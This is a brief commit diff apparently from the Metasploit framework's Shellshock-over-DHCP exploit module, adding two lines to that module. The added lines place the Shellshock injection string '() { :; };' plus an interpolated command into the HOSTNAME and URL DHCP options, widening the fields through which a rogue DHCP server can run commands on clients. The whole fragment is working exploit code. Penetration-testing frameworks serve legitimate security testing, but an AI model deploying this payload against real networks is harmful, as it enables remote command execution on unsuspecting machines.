Add injection to HOSTNAME and URL

modules/exploits/unix/dhcp/bash_environment.rb

@@ -70,6 +70,9 @@ class Metasploit3 < Msf::Exploit::Remote
     if hash['DOMAINNAME'].length > 255
       raise ArgumentError, 'payload too long'
     end
+
+    hash['HOSTNAME'] = "() { :; };#{echo}"
+    hash['URL'] = "() { :; };#{echo}"
     start_service(hash)
 
     begin